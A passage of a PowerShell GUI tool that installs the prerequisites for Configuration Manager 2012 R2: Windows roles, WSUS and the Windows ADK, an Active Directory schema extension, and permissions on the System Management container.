@("FS-FileServer","RDC","Web-WebServer","Web-Common-Http","Web-Default-Doc","Web-Dir-Browsing","Web-Http-Errors","Web-Static-Content","Web-Http-Redirect","Web-Health","Web-Http-Logging","Web-Performance","Web-Stat-Compression","Web-Security","Web-Filtering","Web-Windows-Auth","Web-App-Dev","Web-ISAPI-Ext","Web-Mgmt-Tools","Web-Mgmt-Console","Web-Mgmt-Compat","Web-Metabase","Web-WMI","Web-Scripting-Tools") } if ($OSBuild -ge 9200) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("FS-FileServer","RDC","Web-WebServer","Web-Common-Http","Web-Default-Doc","Web-Dir-Browsing","Web-Http-Errors","Web-Static-Content","Web-Http-Redirect","Web-Health","Web-Http-Logging","Web-Performance","Web-Stat-Compression","Web-Security","Web-Filtering","Web-Windows-Auth","Web-App-Dev","Web-ISAPI-Ext","Web-Mgmt-Tools","Web-Mgmt-Console","Web-Mgmt-Compat","Web-Metabase","Web-WMI","Web-Scripting-Tools") } $ProgressBar.Maximum = ($WinFeatures | Measure-Object).Count $ProgressPreference = "SilentlyContinue" $WarningPreference = "SilentlyContinue" $ButtonBack.Enabled = $false $ButtonInstallDP.Enabled = $false $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (-NOT(Get-WindowsFeature -Name $CurrentFeature | Select-Object Name,Installed | Where-Object { $_.Installed -like "true" })) { Write-OutputBox -OutputBoxMessage "Installing role: $($CurrentFeatureDisplayName.DisplayName)" [System.Windows.Forms.Application]::DoEvents() if (([System.Environment]::OSVersion.Version).Build -lt 9200) { Add-WindowsFeature $CurrentFeature | Out-Null } if (([System.Environment]::OSVersion.Version).Build -ge 9200) { Start-Job -Name $CurrentFeature -ScriptBlock { param( [parameter(Mandatory=$true)] $CurrentFeature ) Add-WindowsFeature $CurrentFeature } -ArgumentList $CurrentFeature | Out-Null Wait-Job -Name $CurrentFeature Remove-Job -Name $CurrentFeature } } else { Write-OutputBox -OutputBoxMessage "Skipping role (already installed): $($CurrentFeatureDisplayName.DisplayName)" } $ProgressBar.PerformStep() } Write-OutputBox -OutputBoxMessage "Starting verification that all features where successfully installed" $ErrorVerify = 0 $ProgressBar.Value = 0 $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (Get-WindowsFeature $CurrentFeature | Where-Object { $_.Installed -eq $true}) { Write-OutputBox "Verified installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } else { $ErrorVerify++ Write-OutputBox "Feature not installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } } if ($ErrorVerify -eq 0) { Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" } else { Write-OutputBox -OutputBoxMessage "One or more Windows Features was not installed" } $ButtonBack.Enabled = $true $Form.Controls.Remove($ButtonInstallDP) $Form.Controls.Add($ButtonFinish) } function Install-EP { $RadioButtonEP.Enabled = $false $RadioButtonEPP.Enabled = $false $OSBuild = ([System.Environment]::OSVersion.Version).Build if ($RadioButtonEP.Checked -eq $true) { if ($OSBuild -ge 9200) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("Web-Server","Web-WebServer","Web-Default-Doc","Web-Dir-Browsing","Web-Http-Errors","Web-Static-Content","Web-Http-Logging","Web-Stat-Compression","Web-Filtering","Web-Net-Ext","Web-Asp-Net","Web-ISAPI-Ext","Web-ISAPI-Filter","Web-Mgmt-Console","Web-Metabase","NET-Framework-Core","NET-Framework-Features","NET-HTTP-Activation","NET-Framework-45-Features","NET-Framework-45-Core","NET-Framework-45-ASPNET","NET-WCF-Services45","NET-WCF-TCP-PortSharing45") } } if ($RadioButtonEPP.Checked -eq $true) { if ($OSBuild -ge 9200) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("Web-Server","Web-WebServer","Web-Default-Doc","Web-Dir-Browsing","Web-Http-Errors","Web-Static-Content","Web-Http-Logging","Web-Stat-Compression","Web-Filtering","Web-Windows-Auth","Web-Net-Ext","Web-Net-Ext45","Web-Asp-Net","Web-Asp-Net45","Web-ISAPI-Ext","Web-ISAPI-Filter","Web-Mgmt-Console","Web-Metabase","NET-Framework-Core","NET-Framework-Features","NET-Framework-45-Features","NET-Framework-45-Core","NET-Framework-45-ASPNET","NET-WCF-Services45","NET-WCF-TCP-PortSharing45") } } $ProgressBar.Maximum = ($WinFeatures | Measure-Object).Count $ProgressPreference = "SilentlyContinue" $WarningPreference = "SilentlyContinue" $ButtonBack.Enabled = $false $ButtonInstallEP.Enabled = $false $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (-NOT(Get-WindowsFeature -Name $CurrentFeature | Select-Object Name,Installed | Where-Object { $_.Installed -like "true" })) { Write-OutputBox -OutputBoxMessage "Installing role: $($CurrentFeatureDisplayName.DisplayName)" [System.Windows.Forms.Application]::DoEvents() if (([System.Environment]::OSVersion.Version).Build -lt 9200) { Add-WindowsFeature $CurrentFeature | Out-Null } if (([System.Environment]::OSVersion.Version).Build -ge 9200) { if ($CurrentFeature -eq "NET-Framework-Core") { Add-WindowsFeature NET-Framework-Core -ErrorAction SilentlyContinue | Out-Null if (Get-WindowsFeature -Name NET-Framework-Core | Select-Object Name,Installed | Where-Object { $_.Installed -like "false" }) { Write-OutputBox -OutputBoxMessage "Failed to install $($CurrentFeatureDisplayName.DisplayName)" -Type "ERROR: " do { if (([System.Environment]::OSVersion.Version).Build -eq 9600) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 R2 installation media for the '<drive-letter>:\sources\sxs' folder." } if (([System.Environment]::OSVersion.Version).Build -eq 9200) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 installation media for the '<drive-letter>:\sources\sxs' folder." } } until (($SetupDLLocation.Length -gt 0) -and (Test-Path -Path "$($SetupDLLocation.SubString(0,2))\sources\sxs" -ErrorAction SilentlyContinue)) Write-OutputBox -OutputBoxMessage "Installing role with specified source location: $($CurrentFeatureDisplayName.DisplayName)" Add-WindowsFeature NET-Framework-Core -Source $SetupDLLocation } } else { Start-Job -Name $CurrentFeature -ScriptBlock { param( [parameter(Mandatory=$true)] $CurrentFeature ) Add-WindowsFeature $CurrentFeature } -ArgumentList $CurrentFeature | Out-Null Wait-Job -Name $CurrentFeature Remove-Job -Name $CurrentFeature } } } else { Write-OutputBox -OutputBoxMessage "Skipping role (already installed): $($CurrentFeatureDisplayName.DisplayName)" } $ProgressBar.PerformStep() } Write-OutputBox -OutputBoxMessage "Starting verification that all features where successfully installed" $ErrorVerify = 0 $ProgressBar.Value = 0 $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (Get-WindowsFeature $CurrentFeature | Where-Object { $_.Installed -eq $true}) { Write-OutputBox "Verified installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } else { $ErrorVerify++ Write-OutputBox "Feature not installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } } if ($ErrorVerify -eq 0) { Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" } else { Write-OutputBox -OutputBoxMessage "One or more Windows Features was not installed" } $ButtonBack.Enabled = $true $Form.Controls.Remove($ButtonInstallEP) $Form.Controls.Add($ButtonFinish) } function Extend-ActiveDirectorySchema { $Form.Controls.Remove($ButtonConnectDC) $Form.Controls.Add($ButtonExtendActiveDirectory) $CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent() $WindowsPrincipal = New-Object System.Security.Principal.WindowsPrincipal($CurrentUser) if (($WindowsPrincipal.IsInRole("Domain Admins")) -and ($WindowsPrincipal.IsInRole("Schema Admins"))) { do { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse to the '<ConfigMgr source files>\SMSSETUP\BIN\X64' folder." } until (Test-Path -Path "$($SetupDLLocation)\EXTADSCH.EXE") $DC = $TextBoxDC.Text $GetPath = Get-ChildItem -Recurse -Filter "EXTADSCH.EXE" -Path "$($SetupDLLocation)" $Path = $GetPath.DirectoryName + "\EXTADSCH.EXE" $Destination = "\\" + $DC + "\C$" Write-OutputBox -OutputBoxMessage "Copying EXTADSCH.EXE to the specified domain controller" Copy-Item $Path $Destination -Force Write-OutputBox -OutputBoxMessage "Starting to extend the Active Directory schema" Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "C:\EXTADSCH.EXE" -ComputerName $DC | Out-Null Start-Sleep -Seconds 10 $Content = Get-Content -Path "\\$($DC)\C$\extadsch.log" if ($Content -match "Successfully extended the Active Directory schema") { Write-OutputBox -OutputBoxMessage "Active Directory schema was successfully extended" $Form.Controls.Remove($ButtonInstallExtendAD) $Form.Controls.Add($ButtonFinish) } else { Write-OutputBox -OutputBoxMessage "Active Directory was not extended successfully, refer to C:\ExtADSch.log on the domain controller" -Type "ERROR: " } } else { Write-OutputBox -OutputBoxMessage "Current logged on user is not a member of the Domain Admins group" -Type "ERROR: " } } function Install-WSUS { $RadioButtonWID.Enabled = $false $RadioButtonSQL.Enabled = $false $TextBoxWSUSSQLServer.Enabled = $false $TextBoxWSUSSQLInstance.Enabled = $false if ($RadioButtonWID.Checked -eq $true) { $WinFeatures = @("UpdateServices","UpdateServices-WidDB","UpdateServices-Services","UpdateServices-RSAT","UpdateServices-API","UpdateServices-UI") } if ($RadioButtonSQL.Checked -eq $true) { $WinFeatures = @("UpdateServices-Services","UpdateServices-RSAT","UpdateServices-API","UpdateServices-UI","UpdateServices-DB") } $ProgressBar.Maximum = 10 $ProgressPreference = "SilentlyContinue" $WarningPreference = "SilentlyContinue" $ButtonBack.Enabled = $false $ButtonInstallWSUS.Enabled = $false $ProgressBar.PerformStep() $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (-NOT(Get-WindowsFeature -Name $CurrentFeature | Select-Object Name,Installed | Where-Object { $_.Installed -like "true" })) { Write-OutputBox -OutputBoxMessage "Installing role: $($CurrentFeatureDisplayName.DisplayName)" Start-Job -Name $CurrentFeature -ScriptBlock { param( [parameter(Mandatory=$true)] $CurrentFeature ) Add-WindowsFeature $CurrentFeature } -ArgumentList $CurrentFeature | Out-Null Wait-Job -Name $CurrentFeature Remove-Job -Name $CurrentFeature } else { Write-OutputBox -OutputBoxMessage "Skipping role (already installed): $($CurrentFeatureDisplayName.DisplayName)" } $ProgressBar.PerformStep() } Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" $WSUSContentPath = Read-FolderBrowserDialog -Message "Choose a location where WSUS content will be stored, e.g. C:\WSUS" $ProgressBar.PerformStep() if (!(Test-Path -Path $WSUSContentPath)) { New-Item $WSUSContentPath -ItemType Directory | Out-Null } if (Test-Path -Path "$Env:ProgramFiles\Update Services\Tools\WsusUtil.exe") { $WSUSUtil = "$Env:ProgramFiles\Update Services\Tools\WsusUtil.exe" if ($RadioButtonWID.Checked -eq $true) { $WSUSUtilArgs = "POSTINSTALL CONTENT_DIR=$WSUSContentPath" } if ($RadioButtonSQL.Checked -eq $true) { if (($TextBoxWSUSSQLServer.Text.Length -ge 1) -and ($TextBoxWSUSSQLServer.Text -notlike $WaterMarkWSUSSQLServer) -and ($TextBoxWSUSSQLInstance.Text -like $WaterMarkWSUSSQLInstance)) { Write-OutputBox -OutputBoxMessage "Choosen configuration is SQL Server, default instance" -Type "INFO: " $WSUSUtilArgs = "POSTINSTALL SQL_INSTANCE_NAME=$($TextBoxWSUSSQLServer.Text) CONTENT_DIR=$($WSUSContentPath)" } if (($TextBoxWSUSSQLServer.Text.Length -ge 1) -and ($TextBoxWSUSSQLServer.Text -notlike $WaterMarkWSUSSQLServer) -and ($TextBoxWSUSSQLInstance.Text.Length -ge 1) -and ($TextBoxWSUSSQLInstance.Text -notlike $WaterMarkWSUSSQLInstance)) { Write-OutputBox -OutputBoxMessage "Choosen configuration is SQL Server, named instance" -Type "INFO: " $WSUSUtilArgs = "POSTINSTALL SQL_INSTANCE_NAME=$($TextBoxWSUSSQLServer.Text)\$($TextBoxWSUSSQLInstance.Text) CONTENT_DIR=$($WSUSContentPath)" } } Write-OutputBox -OutputBoxMessage "Starting WSUS post install configuration" $ProgressBar.PerformStep() Start-Process -FilePath $WSUSUtil -ArgumentList $WSUSUtilArgs -NoNewWindow -Wait -RedirectStandardOutput "C:\temp.txt" | Out-Null $ProgressBar.PerformStep() Write-OutputBox -OutputBoxMessage "Successfully installed and configured WSUS" Remove-Item "C:\temp.txt" -Force $ButtonBack.Enabled = $true $Form.Controls.Remove($ButtonInstallWSUS) $Form.Controls.Add($ButtonFinish) } else { $ProgressBar.PerformStep() Write-OutputBox -OutputBoxMessage "Unable to locate $($WSUSUtil)" $ProgressBar.PerformStep() $ButtonBack.Enabled = $true $ButtonInstallWSUS.Enabled = $true } } function Install-ADK { $RadioButtonOnline.Enabled = $false $RadioButtonOffline.Enabled = $false $ButtonInstallADK.Enabled = $false $ButtonBack.Enabled = $false $ADKInstalledFeatures = @() $ComputerName = $env:COMPUTERNAME $UninstallKey = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall" $Registry = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$ComputerName) $RegistryKey = $Registry.OpenSubKey($UninstallKey) $SubKeys = $RegistryKey.GetSubKeyNames() ForEach ($Key in $SubKeys) { $CurrentKey = $UninstallKey + "\\" + $Key $CurrentSubKey = $Registry.OpenSubKey($CurrentKey) $DisplayName = $CurrentSubKey.GetValue("DisplayName") if ($DisplayName -like "Windows PE x86 x64") { $ADKInstalledFeatures += $DisplayName } elseif ($DisplayName -like "User State Migration Tool") { $ADKInstalledFeatures += $DisplayName } elseif ($DisplayName -like "Windows Deployment Tools") { $ADKInstalledFeatures += $DisplayName } } if (($RadioButtonOnline.Checked -eq $true) -AND ($ADKInstalledFeatures.Length -ne 3)) { $ADKOnlineArguments = "/norestart /q /ceip off /features OptionId.WindowsPreinstallationEnvironment OptionId.DeploymentTools OptionId.UserStateMigrationTool" $ADKDownloadFolder = "C:\Downloads" $ADKSetupFile = "adksetup.exe" Get-WebDownloadFile -URL "http://download.microsoft.com/download/6/A/E/6AEA92B0-A412-4622-983E-5B305D2EBE56/adk/adksetup.exe" -DownloadFolder $ADKDownloadFolder -FileName $ADKSetupFile Write-OutputBox -OutputBoxMessage "Download completed" -Type "INFO: " [System.Windows.Forms.Application]::DoEvents() Write-OutputBox -OutputBoxMessage "Starting Windows ADK installation" -Type "INFO: " [System.Windows.Forms.Application]::DoEvents() Write-OutputBox -OutputBoxMessage "Downloading Windows ADK components and installing, this will take some time" -Type "INFO: " [System.Windows.Forms.Application]::DoEvents() Start-Process -FilePath "$($ADKDownloadFolder)\$($ADKSetupFile)" -ArgumentList $ADKOnlineArguments while (Get-WmiObject -Class Win32_Process -Filter 'Name="adksetup.exe"') { [System.Windows.Forms.Application]::DoEvents() Start-Sleep -Milliseconds 500 } Write-OutputBox -OutputBoxMessage "Successfully installed Windows ADK" -Type "INFO: " } elseif (($RadioButtonOffline.Checked -eq $true) -AND ($ADKInstalledFeatures.Length -ne 3)) { $ADKOfflineArguments = "/norestart /q /ceip off /features OptionId.WindowsPreinstallationEnvironment OptionId.DeploymentTools OptionId.UserStateMigrationTool" $ADKSetupFile = "adksetup.exe" do { $SetupLocation = Read-FolderBrowserDialog -Message "Select the folder where adksetup.exe is located" if (-not(Test-Path -Path "$($SetupLocation)\$($ADKSetupFile)")) { $ADKShellObject = New-Object -ComObject Wscript.Shell $PopupValidate = $ADKShellObject.Popup("Unable to find $($ADKSetupFile) in the selected folder",0,"Unable to locate file",0) } } until (Test-Path -Path "$($SetupLocation)\$($ADKSetupFile)") Write-OutputBox -OutputBoxMessage "Starting Windows ADK installation, this will take some time" Start-Process -FilePath "$($SetupLocation)\$($ADKSetupFile)" -ArgumentList $ADKOfflineArguments while (Get-WmiObject -Class Win32_Process -Filter 'Name="adksetup.exe"') { [System.Windows.Forms.Application]::DoEvents() Start-Sleep -Milliseconds 500 } Write-OutputBox -OutputBoxMessage "Successfully installed Windows ADK" } else { if ($ADKInstalledFeatures.Length -eq 3) { Write-OutputBox -OutputBoxMessage "All required Windows ADK features are already installed, skipping install" -Type "INFO: " } } $ButtonBack.Enabled = $true $Form.Controls.Remove($ButtonInstallADK) $Form.Controls.Add($ButtonFinish) } function Configure-SystemManagementContainerComputer { $OutputBox.ResetText() $ADDomain = New-Object System.DirectoryServices.DirectoryEntry | Select-Object -ExpandProperty distinguishedName try { $ADFilter = "(&(objectClass=container)(cn=*System Management*))" $ADSearch = New-Object System.DirectoryServices.DirectorySearcher($ADFilter) $ADResult = $ADSearch.FindOne() $Container = $ADResult.GetDirectoryEntry() } catch { $SMCError = $_.Exception.Message } if ($CBSMCCreate.Checked -eq $true) { try { if ($Container) { Write-OutputBox -OutputBoxMessage "Found container $($ContainerDN)" -Type "INFO: " Write-OutputBox -OutputBoxMessage "System Management container found, will not create it" -Type "INFO: " } else { Write-OutputBox -OutputBoxMessage "System Management container not found" -Type "INFO: " Write-OutputBox -OutputBoxMessage "Creating the 'System Management' container" -Type "INFO: " $ObjectDomain = New-Object System.DirectoryServices.DirectoryEntry $ObjectContainer = $ObjectDomain.Create("container", "CN=System Management,CN=System") $ObjectContainer.SetInfo() | Out-Null Write-OutputBox -OutputBoxMessage "System Management container created successfully" -Type "INFO: " } } catch { Write-OutputBox -OutputBoxMessage "$($_.Exception.Message)" -Type "ERROR: " } } $SearchComputerAdded = { $ComputerFilter = "(&(ObjectClass=Computer)(samAccountName=*$($ComputerName)*))" $ComputerSearch = New-Object System.DirectoryServices.DirectorySearcher($ComputerFilter) $ComputerResult = $ComputerSearch.FindOne() $ComputerObjectSID = New-Object System.Security.Principal.SecurityIdentifier $ComputerResult.Properties["objectSID"][0],0 [System.Security.Principal.SecurityIdentifier]$ComputerSID = $ComputerObjectSID.Value $ComputerIdentityReference = @() $ContainerObject = [ADSI]("LDAP://CN=System Management,CN=System,$($ADDomain)") $ContainerObject.ObjectSecurity.GetAccessRules($true,$true,[System.Security.Principal.SecurityIdentifier]) | ForEach-Object { $ComputerIdentityReference += $_.IdentityReference } if ($ComputerIdentityReference.Value -match $ComputerSID.Value) { return $true } else { return $false } } if (($RadioButtonSMCLocal.Checked -eq $true) -and ($Container)) { $ComputerName = $TextBoxSMCLocal.Text if ($SearchComputerAdded.Invoke()) { Write-OutputBox -OutputBoxMessage "Computer account is already added to the System Management container" -Type "INFO: " $ButtonConfigureSystemManagementContainerComputer.Enabled = $true } else { try { Write-OutputBox -OutputBoxMessage "Adding $($ComputerName) to the System Management container" -Type "INFO: " $ComputerFilter = "(&(ObjectClass=Computer)(samAccountName=*$($ComputerName)*))" $ComputerSearch = New-Object System.DirectoryServices.DirectorySearcher($ComputerFilter) $ComputerResult = $ComputerSearch.FindOne() $ComputerObjectSID = New-Object System.Security.Principal.SecurityIdentifier $ComputerResult.Properties["objectSID"][0],0 [System.Security.Principal.SecurityIdentifier]$ComputerSID = $ComputerObjectSID.Value $ContainerObject = [ADSI]("LDAP://CN=System Management,CN=System,$($ADDomain)") $ComputerSchemaGUID = New-Object GUID 00000000-0000-0000-0000-000000000000 $ContainerACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($ComputerSID,"GenericAll","Allow","All",$ComputerSchemaGUID) $ContainerObject.ObjectSecurity.AddAccessRule($ContainerACE) $ContainerObject.CommitChanges() Write-OutputBox -OutputBoxMessage "Successfully added $($ComputerName) to the System Management container" -Type "INFO: " $ButtonConfigureSystemManagementContainerComputer.Enabled = $false $RadioButtonSMCLocal.Enabled = $false $RadioButtonSMCRemote.Enabled = $false $TextBoxSMCRemote.Enabled = $false } catch { Write-OutputBox -OutputBoxMessage "$($_.Exception.Message)" -Type "ERROR: " } } } if (($RadioButtonSMCRemote.Checked -eq $true) -and ($Container)) { $ComputerName = $TextBoxSMCRemote.Text if ($TextBoxSMCRemote.Text.Length -gt 1) { if ($SearchComputerAdded.Invoke()) { Write-OutputBox -OutputBoxMessage "Computer account is already added to the System Management container" -Type "INFO: " $ButtonConfigureSystemManagementContainerComputer.Enabled = $true } else { try { Write-OutputBox -OutputBoxMessage "Adding $($ComputerName) to the System Management container" -Type "INFO: " $ComputerFilter = "(&(ObjectClass=Computer)(samAccountName=*$($ComputerName)*))" $ComputerSearch = New-Object System.DirectoryServices.DirectorySearcher($ComputerFilter) $ComputerResult = $ComputerSearch.FindOne() $ComputerObjectSID = New-Object System.Security.Principal.SecurityIdentifier $ComputerResult.Properties["objectSID"][0],0 [System.Security.Principal.SecurityIdentifier]$ComputerSID = $ComputerObjectSID.Value $ContainerObject = [ADSI]("LDAP://CN=System Management,CN=System,$($ADDomain)") $ComputerSchemaGUID = New-Object GUID 00000000-0000-0000-0000-000000000000 $ContainerACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($ComputerSID,"GenericAll","Allow","All",$ComputerSchemaGUID) $ContainerObject.ObjectSecurity.AddAccessRule($ContainerACE) $ContainerObject.CommitChanges() Write-OutputBox -OutputBoxMessage "Successfully added $($ComputerName) to the System Management container" -Type "INFO: " $ButtonConfigureSystemManagementContainerComputer.Enabled = $false $RadioButtonSMCLocal.Enabled = $false $RadioButtonSMCRemote.Enabled = $false $TextBoxSMCRemote.Enabled = $false } catch { Write-OutputBox -OutputBoxMessage "$($_.Exception.Message)" -Type "ERROR: " } } } elseif ($ComputerName.Length -eq 0) { Write-OutputBox -OutputBoxMessage "Please enter a computer name" -Type "WARNING: " } } } function Configure-SystemManagementContainerGroup { Write-OutputBox -OutputBoxMessage "Checking if '$($ADGroupName)' is already added to the System Management container" -Type "INFO: " $ADDomain = New-Object System.DirectoryServices.DirectoryEntry | Select-Object -ExpandProperty distinguishedName $ADGroupName = $TextBoxSMCGroupResult.Text $ADGroupFilter = "(&(ObjectCategory=group)(samAccountName=*$($ADGroupName)*))" $ADGroupSearch = New-Object System.DirectoryServices.DirectorySearcher($ADGroupFilter) $ADGroupSearch.FindAll() | ForEach-Object { $Object = New-Object System.Security.Principal.SecurityIdentifier $_.Properties["objectSID"][0],0 [System.Security.Principal.SecurityIdentifier]$ADGroupSID = $Object.Value } $IdentityReference = @() $ContainerObject = [ADSI]("LDAP://CN=System Management,CN=System,$($ADDomain)") $ContainerObject.ObjectSecurity.GetAccessRules($true,$true,[System.Security.Principal.SecurityIdentifier]) | ForEach-Object { $IdentityReference += $_.IdentityReference } if ($IdentityReference.Value -match $ADGroupSID.Value) { Write-OutputBox -OutputBoxMessage "'$($ADGroupName)' is already added to the System Management container" -Type "WARNING: " } else { try { Write-OutputBox -OutputBoxMessage "Adding '$($ADGroupName)' to the System Management container" -Type "INFO: " $ObjectGUID = New-Object GUID 00000000-0000-0000-0000-000000000000 $ContainerACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule ($ADGroupSID,"GenericAll","Allow","All",$ObjectGUID) $ContainerObject.ObjectSecurity.AddAccessRule($ContainerACE) $ContainerObject.CommitChanges() Write-OutputBox -OutputBoxMessage "Succesfully added '$($ADGroupName)' to the System Management container" -Type "INFO: " } catch { Write-OutputBox -OutputBoxMessage "$($_.Exception.Message)" -Type "ERROR: " } } } function Validate-ADGroupSearch { $DGVSMCGroup.Rows.Clear() $DGVSMCGroup.Refresh() } function Search-ADGroup { if ($DGVSMCGroup.Rows.Count -ge 1) { Validate-ADGroupSearch } $ADGroupFilter = "(&(ObjectCategory=group)(samAccountName=*$($TextBoxSMCGroupSearch.Text)*))" $ADGroupSearch = New-Object System.DirectoryServices.DirectorySearcher($ADGroupFilter) $ADGroupSearch.FindAll() | ForEach-Object -Begin { Write-OutputBox -OutputBoxMessage "Showing the results" -Type "INFO: " } -Process { $DGVSMCGroup.Rows.Add(([string]$_.Properties.Item("samAccountName"))) | Out-Null } Write-OutputBox -OutputBoxMessage "Select a group from the results view and click 'Configure'" -Type "INFO: " } function Read-FolderBrowserDialog { param( [parameter(Mandatory=$true)] [string]$Message ) $ShellApplication = New-Object -ComObject Shell.Application $FolderBrowserDialog = $ShellApplication.BrowseForFolder(0,"$($Message)",0,17) if ($FolderBrowserDialog) { return $FolderBrowserDialog.Self.Path } else { return "" } } function Clear-OutputBox { $OutputBox.ResetText() } function Get-WebDownloadFile { param( [Parameter(Mandatory=$true)] [String]$URL, [Parameter(Mandatory=$true)] [string]$DownloadFolder, [Parameter(Mandatory=$true)] [string]$FileName ) process { $ProgressBar.Maximum = 100 $ProgressBar.Value = 0 $WebClient = New-Object System.Net.WebClient if (-not(Test-Path -Path $DownloadFolder)) { Write-OutputBox -OutputBoxMessage "Creating download folder: $($DownloadFolder)" [System.Windows.Forms.Application]::DoEvents() New-Item $DownloadFolder -ItemType Directory | Out-Null } $Global:DownloadComplete = $False $EventDataComplete = Register-ObjectEvent $WebClient DownloadFileCompleted -SourceIdentifier WebClient.DownloadFileComplete -Action {$Global:DownloadComplete = $True} $EventDataProgress = Register-ObjectEvent $WebClient DownloadProgressChanged -SourceIdentifier WebClient.DownloadProgressChanged -Action { $Global:DPCEventArgs = $EventArgs } $WebClient.DownloadFileAsync($URL, "$($DownloadFolder)\$($FileName)") Write-OutputBox -OutputBoxMessage "Downloading ($($FileName) to $($DownloadFolder)" do { $PercentComplete = $Global:DPCEventArgs.ProgressPercentage $DownloadedBytes = $Global:DPCEventArgs.BytesReceived $TotalBytes = $Global:DPCEventArgs.TotalBytesToReceive $ProgressBar.Value = $PercentComplete [System.Windows.Forms.Application]::DoEvents() } until ($Global:DownloadComplete) $WebClient.Dispose() Unregister-Event -SourceIdentifier WebClient.DownloadProgressChanged Unregister-Event -SourceIdentifier WebClient.DownloadFileComplete } } function Get-PrereqFiles { $DownloadDestination = "C:\ConfigMgrPrereqs" if (-not(Test-Path -Path $DownloadDestination)) { New-Item -ItemType Directory -Path $DownloadDestination } do { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse to the '<ConfigMgr source files>\SMSSETUP\BIN\X64' folder." } until (Test-Path -Path "$($SetupDLLocation)\setupdl.exe") Write-OutputBox -OutputBoxMessage "Downloading prerequites from Microsoft" do { Start-Process -FilePath "$($SetupDLLocation)\setupdl.exe" -ArgumentList "$($DownloadDestination)" -Wait } until ((Get-ChildItem -Path $DownloadDestination | Measure-Object).Count -ge 59) Write-OutputBox -OutputBoxMessage "Successfully downloaded all prerequisites" $ButtonBack.Enabled = $true if ($InstallType -eq 1) { $Form.Controls.Remove($ButtonInstallCAS) } if ($InstallType -eq 2) { $Form.Controls.Remove($ButtonInstallPrimarySite) } $Form.Controls.Add($ButtonFinish) } function Write-OutputBox { param( [parameter(Mandatory=$true)] [string]$OutputBoxMessage, [ValidateSet("WARNING: ","ERROR: ","INFO: ")] [string]$Type ) Process { if ($OutputBox.Text.Length -eq 0) { $OutputBox.Text = "$($Type)$($OutputBoxMessage)" [System.Windows.Forms.Application]::DoEvents() } else { $OutputBox.AppendText("`n$($Type)$($OutputBoxMessage)") [System.Windows.Forms.Application]::DoEvents() } } } function Enter-WaterMark { param( [parameter(Mandatory=$true)] $InputObject, [parameter(Mandatory=$true)] $Text ) if ($InputObject.Text -eq $Text) { $InputObject.Text = "" $InputObject.ForeColor = "WindowText" } } function Leave-WaterMark { param( [parameter(Mandatory=$true)] $InputObject, [parameter(Mandatory=$true)] $Text ) if ($InputObject.Text -eq "") { $InputObject.Text = $Text $InputObject.ForeColor = "LightGray" } } function Leave-WaterMarkStart { param( [parameter(Mandatory=$true)] $InputObject, [parameter(Mandatory=$true)] $Text ) if ($InputObject.Text.Length -gt 0) { $InputObject.Text = $Text $InputObject.ForeColor = "LightGray" } } [void][System.Reflection.Assembly]::LoadWithPartialName("System.Drawing") [void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") [void][System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices") $InstallType = 0 $Form = New-Object System.Windows.Forms.Form $Form.Size = New-Object System.Drawing.Size(800,500) $Form.MinimumSize = New-Object System.Drawing.Size(800,500) $Form.MaximumSize = New-Object System.Drawing.Size(800,500) $Form.SizeGripStyle = "Hide" $Form.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($PSHome + "\powershell.exe") $Form.Text = "ConfigMgr 2012 R2 Prerequisites Installation Tool - 1.2.1" $TabPageSMCComputer = New-Object System.Windows.Forms.TabPage $TabPageSMCComputer.Location = New-Object System.Drawing.Size(10,50) $TabPageSMCComputer.Size = New-Object System.Drawing.Size(300,300) $TabPageSMCComputer.Text = "Computer" $TabPageSMCComputer.Name = "Computer" $TabPageSMCComputer.Padding = "0,0,0,0" $TabPageSMCComputer.BackColor = "Control" $TabPageSMCGroup = New-Object System.Windows.Forms.TabPage $TabPageSMCGroup.Location = New-Object System.Drawing.Size(0,0) $TabPageSMCGroup.Size = New-Object System.Drawing.Size(300,300) $TabPageSMCGroup.Text = "Group " $TabPageSMCGroup.Name = "Group" $TabPageSMCGroup.Padding = "0,0,0,0" $TabPageSMCGroup.BackColor = "Control" $TabPageSMCGroup.Margin = 